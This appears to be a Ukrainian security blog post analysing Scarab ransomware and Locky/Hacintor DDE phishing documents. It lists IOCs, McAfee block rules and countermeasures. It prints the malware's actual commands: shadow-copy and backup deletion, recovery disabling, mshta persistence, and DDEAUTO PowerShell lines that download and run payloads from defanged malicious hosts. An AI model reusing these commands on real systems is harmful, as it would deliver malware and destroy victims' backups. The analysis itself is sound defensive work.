Якщо йому це вдається, він копіює своє тіло ще раз у %AppData%\Roaming але вже для адміністративного облікового запису

"C:\Windows\system32\cmd.exe" /c copy /y "C:\tmp\VJMAQASU.exe" "C:\Users\operator\AppData\Roaming\sevnz.exe"
"C:\tmp\VJMAQASU.exe" runas
"C:\Windows\system32\cmd.exe" /c copy /y "C:\tmp\VJMAQASU.exe" "C:\Users\support\AppData\Roaming\sevnz.exe"
"C:\Users\support\AppData\Roaming\sevnz.exe"

Далі через mshta за допомогою javascript команд Scarab додає в автозавантаження посилання на замітку про викуп і ініціює видалення тіньових копій:

mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('sevnz.exe').Path;o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\uSjBVNE',i);}catch(e){}},10);"
mshta.exe "javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\STYRX\\OCDPR'));close();"
"C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
"C:\Windows\System32\cmd.exe" /c wmic SHADOWCOPY DELETE
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\cmd.exe" /c vssadmin Delete Shadows /All /Quiet
vssadmin  Delete Shadows /All /Quiet
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

В фоні відбувається шифрування через послідовний перезапис файлів процесом AppData\Roaming\sevnz.exe

По завершенню шифрування Scarab відкриває файл із заміткою про викуп та ініціює видалення свого тіла (за обома шляхами – temp та appdata)

C:\Windows\system32\cmd.exe /c start /max notepad.exe "C:\Users\support\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT"
notepad.exe  "C:\Users\support\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT"
mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('sevnz.exe');close()}catch(e){}},10);"
mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('VJMAQASU.exe');close()}catch(e){}},10);"

Зашифровані файли отримують розширення .[suupport(@)protonmail[.]com].scarab

Шифрування невеликої кількості документів зайняло ~5-7 хвилин

Частина замітки про викуп:

__________________________________________________________________________________________________
|                                                                                                  |
|                 *** IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS ***                 |
|__________________________________________________________________________________________________|

Your files are now encrypted!

-----BEGIN PERSONAL IDENTIFIER-----
123oin123njnjndoiqn2oenq2oindiqndkqndknwqkndkawndkawndkl
-----END PERSONAL IDENTIFIER-----

All your files have been encrypted due to a security problem with your PC.

Мережеві IOC:

завантаження основного тіла Scarab:

5.2.88.79:80            HTTP 367 pamplonarecados[.]com GET /JHgd476? HTTP/1.1 
98.124.251.75:80      HTTP 375 atlantarecyclingcenters[.]com GET /JHgd476? HTTP/1.1
66.36.165.149:80      HTTP 372 hellonwheelsthemovie[.]com GET /JHgd476? HTTP/1.1
5.2.88.79:80            HTTP 367 pamplonarecados[.]com GET /JHgd476? HTTP/1.1
66.36.165.149:80      HTTP 372 hellonwheelsthemovie[.]com GET /JHgd476? HTTP/1.1
98.124.251.75:80      HTTP 371 miamirecyclecenters[.]com GET /JHgd476? HTTP/1.1
5.2.88.79:80            HTTP 367 pamplonarecados[.]com GET /JHgd476? HTTP/1.1
66.36.173.111:80      HTTP 364 hard-grooves[.]com GET /JHgd476? HTTP/1.1 (досі активний)

відправка даних про Public IP

88.99.66.31:80       HTTP 101 iplogger[.]co GET /18RtV6.jpg HTTP/1.1 - передача через cookie

Що можна було зробити аби уникнути інфікування ?

  1. Фільтр скриптових приєднань (VBS, JS, JSE, WSF..)
  2. Заборона завантаження скриптових та запусних файлів (payload у Scarab не шифрований)
  3. Заборона створення VBS та EXE в каталозі профілю користувача (приклади правил наведені нижче)
  4. Деактивація механізму Windows Scritp Host (другий варіант)
  5. Або блокування вихідного трафіку для процесів WSCritp та CSCript (перший варіант)

Приклади правил Access Protection (McAfee VSE, McAfee ENS):

Заборона створення запускних файлів

Name: _exe_prof_BLK
Process to include: *
Processes to exclude: -
File or folder name to block: **\Users\*\**\*.EXE
File actions to prevent:
+ Read
+ Write
+ Create
+ Execute

Заборона створення скриптових файлів (увага! приклад тільки для VBS, рекомендується продублювати правила для JS, JSE, WSF)

Name: _VBS_prof_BLK
Process to include: *
Processes to exclude: -
File or folder name to block: **\Users\*\**\*.VBS
File actions to prevent:
+ Read
+ Write
+ Create
+ Execute

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам (звертайте увагу не стільки на конкретні URL як на коди GET запитів)
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/створення/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

DDE_Locky

Чув дзвін та не знаю де він…
Зразок Locky який доставляли сьогодні через механізм DDE не був націлений на українські системи.
Принаймні завантажувати основну шифруючу частину для мене він відмовився – це все відлуння західних кампаній
Люди, котрі дослухалися до моїх рекомендацій можуть спати спокійно.
Люди у яких GTI працює – теж, бо payload детектиться по GTI
Нагадую що Locky дає ось таку картинку:
А сьогоднішню (ой вже вчорашню паніку викликала кампанія #BadRabbit – fake flash update) – про неї буде наступний допис
А це в свою чергу означає що зразки документів із DDE не мають відношення до вчорашнього інциденту.
DDE окремо, а BadRabbit – окремо.
Але про всяк випадок дам вам деталі по всім DDE документам-приманкам які мені надсилали, коротко
Invoice_file_63539
DDEAUTO C:\\Windows\\System32\\cmd.exe "/k powershell.exe -NonI -noexit -NoP -sta $sr=(new-object IO.StreamReader ((([Net.WebRequest]::Create(' h11p://transmercasa[.]com/JHGGsdsw6')).GetResponse()).GetResponseStream())).ReadToEnd();powershell.exe -e $sr"  
C:\Windows\System32\cmd.exe /k powershell.exe -NonI -noexit -NoP -sta $sr=(new-object IO.StreamReader ((([Net.WebRequest]::Create(' h11p://transmercasa[.]com/JHGGsdsw6')).GetResponse()).GetResponseStream())).ReadToEnd();powershell.exe -e $sr
75.98.175.70 80 HTTP 129 transmercasa[.]com GET /JHGGsdsw6 HTTP/1.1
151.236.60.40 80 HTTP 133 tatianadecastelbajac[.]fr GET /kjhgFG HTTP/1.1
зразок описаний в повідомленні CERT_UA
Invoice_file_06565.doc
DDEAUTO C:\\Windows\\System32\\cmd.exe "/k powershell.exe -NonI -noexit -NoP -sta $sr=(new-object IO.StreamReader ((([Net.WebRequest]::Create('h11p://urcho[.]com/JHGGsdsw6')).GetResponse()).GetResponseStream())).ReadToEnd();powershell.exe -e $sr"  
C:\Windows\System32\cmd.exe /k powershell.exe -NonI -noexit -NoP -sta $sr=(new-object IO.StreamReader ((([Net.WebRequest]::Create('h11p://urcho[.]com/JHGGsdsw6')).GetResponse()).GetResponseStream())).ReadToEnd();powershell.exe -e $sr

87.106.69.81 80 HTTP 122 urcho[.]com GET /JHGGsdsw6 HTTP/1.1
151.236.60.40 80 HTTP 133 tatianadecastelbajac[.]fr GET /kjhgFG HTTP/1.1

зразки з минулого тижня - блокуйте DDE бо посилань згенерують тисячі тисяч
I_213380.doc 
DDE C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://ryanbaptistchurch.com/KJHDhbje71');powershell -e $e "  

I_303643.doc
DDE C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://arkberg-design.fi/KJHDhbje71');powershell -e $e "  

I_489192.doc
DDE C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://arkberg-design.fi/KJHDhbje71');powershell -e $e "  

I_535073.doc
DDE C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://arkberg-design.fi/KJHDhbje71');powershell -e $e "  

DC0003342.doc 
DDE C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://pragmaticinquiry.org/hjergf76');powershell -e $e "  

20170927_954285.doc 
DDE C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://sene-gal.de/cijweh78fDFA');powershell -e $e "  

- крайні два це вже не Locky а Hacintor але різниці особливої немає
Блокуйте DDE і створення екзешників в %temp%

Контрзаходи:

  • Деактивація DDE (через параметр реєстру) або груповими політиками
  • Заборона створення дочірніх процесів для додатків MS Office
  • Заборона доступу до мережі Інтернет для powershell – не надійно, бо DDE не обмежується передачею команд тільки на powershell
  • Заборона створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR